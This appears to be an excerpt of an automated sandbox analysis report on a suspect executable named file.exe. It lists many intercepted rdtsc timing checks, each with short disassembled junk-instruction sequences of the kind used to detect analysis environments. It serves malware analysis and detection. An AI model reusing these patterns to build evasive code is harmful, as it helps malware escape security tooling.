                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE29F second address: 10DE2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EEh 0x00000007 js 00007F08ED2385E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DE2BC second address: 10DE2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F08ED2F2E8Ch 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F08ED2F2E91h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0DA5 second address: 10E0DAF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08ED2385E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E0F4B second address: 10E0F57 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F08ED2F2E86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3825 second address: 10E382D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E3385 second address: 10E339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 ja 00007F08ED2F2E86h 0x0000000c jmp 00007F08ED2F2E8Ah 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E339C second address: 10E33C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F08ED2385ECh 0x00000008 jl 00007F08ED2385EEh 0x0000000e jne 00007F08ED2385E6h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c pop ebx 0x0000001d push ebx 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E33C8 second address: 10E33D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E352C second address: 10E3544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F08ED2385F3h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6CA4 second address: 10E6CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F08ED2F2E86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6CB2 second address: 10E6CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6CB6 second address: 10E6CC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E8Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E6E4A second address: 10E6E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F08ED2385EEh 0x0000000a jmp 00007F08ED2385EBh 0x0000000f popad 0x00000010 je 00007F08ED238604h 0x00000016 pushad 0x00000017 jc 00007F08ED2385E6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB368 second address: 10EB36D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB36D second address: 10EB387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F08ED2385F4h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB667 second address: 10EB678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jp 00007F08ED2F2E86h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB678 second address: 10EB67C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB7E6 second address: 10EB7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB7EA second address: 10EB7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB7F0 second address: 10EB815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F08ED2F2E8Fh 0x0000000e jmp 00007F08ED2F2E8Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB815 second address: 10EB833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F08ED2385F1h 0x0000000c jnl 00007F08ED2385E6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB833 second address: 10EB84A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F08ED2F2E86h 0x00000008 jmp 00007F08ED2F2E8Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBADB second address: 10EBAE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBAE1 second address: 10EBB13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E94h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F08ED2F2E95h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB13 second address: 10EBB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109B6CA second address: 109B6ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2F2E95h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1844 second address: 10F1890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F08ED2385E6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push esi 0x0000000d jp 00007F08ED2385E6h 0x00000013 pop esi 0x00000014 pushad 0x00000015 jmp 00007F08ED2385EAh 0x0000001a jmp 00007F08ED2385F5h 0x0000001f jmp 00007F08ED2385F6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1890 second address: 10F1898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DEF second address: 10F0DF9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08ED2385E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0DF9 second address: 10F0E0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08ED2F2E8Bh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0E0A second address: 10F0E30 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F08ED2385F9h 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0F84 second address: 10F0F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F08ED2F2E86h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0F8E second address: 10F0F9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F0F9C second address: 10F0FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jbe 00007F08ED2F2E97h 0x0000000f jmp 00007F08ED2F2E8Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1157 second address: 10F1188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F08ED2385F3h 0x0000000a popad 0x0000000b jmp 00007F08ED2385F0h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1188 second address: 10F11AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F08ED2F2E97h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e js 00007F08ED2F2E86h 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F11AF second address: 10F11B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F08ED2385ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F144B second address: 10F1451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F1451 second address: 10F1467 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F08ED2385F2h 0x0000000e jnl 00007F08ED2385E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F87AE second address: 10F87B4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F87B4 second address: 10F87C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F08ED2385E6h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6971 second address: 10F6975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6975 second address: 10F6995 instructions: 0x00000000 rdtsc 0x00000002 je 00007F08ED2385E6h 0x00000008 jmp 00007F08ED2385F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6995 second address: 10F699A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6EAD second address: 10F6EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F6EB2 second address: 10F6EE2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F08ED2F2E8Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F08ED2F2EAAh 0x00000014 jmp 00007F08ED2F2E94h 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007F08ED2F2E86h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F7A21 second address: 10F7A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2385F5h 0x00000009 je 00007F08ED2385E6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F8277 second address: 10F827E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FD989 second address: 10FD98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11015D8 second address: 11015EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F08ED2F2E92h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11015EF second address: 11015F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11015F4 second address: 1101627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F08ED2F2E86h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 ja 00007F08ED2F2E9Bh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1101627 second address: 110162B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1100EFB second address: 1100F00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1101071 second address: 1101077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1101077 second address: 110107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110131C second address: 110133F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385F6h 0x00000009 popad 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110133F second address: 1101343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110877F second address: 1108783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108783 second address: 11087B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F08ED2F2E92h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F08ED2F2E95h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11087B3 second address: 11087BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F08ED2385E6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108920 second address: 110893D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F08ED2F2E8Ch 0x0000000c ja 00007F08ED2F2E86h 0x00000012 jns 00007F08ED2F2E88h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108C56 second address: 1108C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108C5C second address: 1108C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108C60 second address: 1108CD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2385EAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jne 00007F08ED2385E6h 0x00000014 jmp 00007F08ED2385F6h 0x00000019 jmp 00007F08ED2385F9h 0x0000001e popad 0x0000001f pushad 0x00000020 jns 00007F08ED2385E6h 0x00000026 jmp 00007F08ED2385F0h 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d push edx 0x0000002e pop edx 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 jnl 00007F08ED2385E6h 0x00000038 jg 00007F08ED2385E6h 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108E5B second address: 1108E63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1108E63 second address: 1108E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F08ED2385E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109239 second address: 1109260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F08ED2F2E97h 0x0000000a pop esi 0x0000000b ja 00007F08ED2F2E90h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1109387 second address: 110938F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110C972 second address: 110C987 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F08ED2F2E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111549 second address: 111157D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F08ED2385F2h 0x00000009 popad 0x0000000a push ecx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F08ED2385F9h 0x00000012 pop ecx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 105E4B0 second address: 105E4B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110FA8 second address: 1110FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F08ED2385E6h 0x0000000a popad 0x0000000b jp 00007F08ED2385F2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11112B9 second address: 11112CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F08ED2F2E8Dh 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11112CF second address: 11112D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111E5E7 second address: 111E5F7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F08ED2F2E86h 0x00000008 jno 00007F08ED2F2E86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11215AB second address: 11215C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F08ED2385F5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11215C5 second address: 11215CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112175E second address: 112176A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F08ED2385E6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112176A second address: 1121777 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1121777 second address: 112178F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F08ED2385F0h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112BA31 second address: 112BA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132374 second address: 113237A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BB3F second address: 113BB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F08ED2F2E91h 0x00000009 jmp 00007F08ED2F2E99h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BB6D second address: 113BB98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F08ED2385F5h 0x00000011 jo 00007F08ED2385EAh 0x00000017 push edi 0x00000018 pop edi 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BB98 second address: 113BBA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F08ED2F2E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BBA2 second address: 113BBB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F08ED2385ECh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A36E second address: 113A3A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F08ED2F2E98h 0x00000007 jmp 00007F08ED2F2E94h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A50D second address: 113A511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113A848 second address: 113A866 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F08ED2F2E97h 0x00000008 pop esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AA07 second address: 113AA16 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F08ED2385E6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
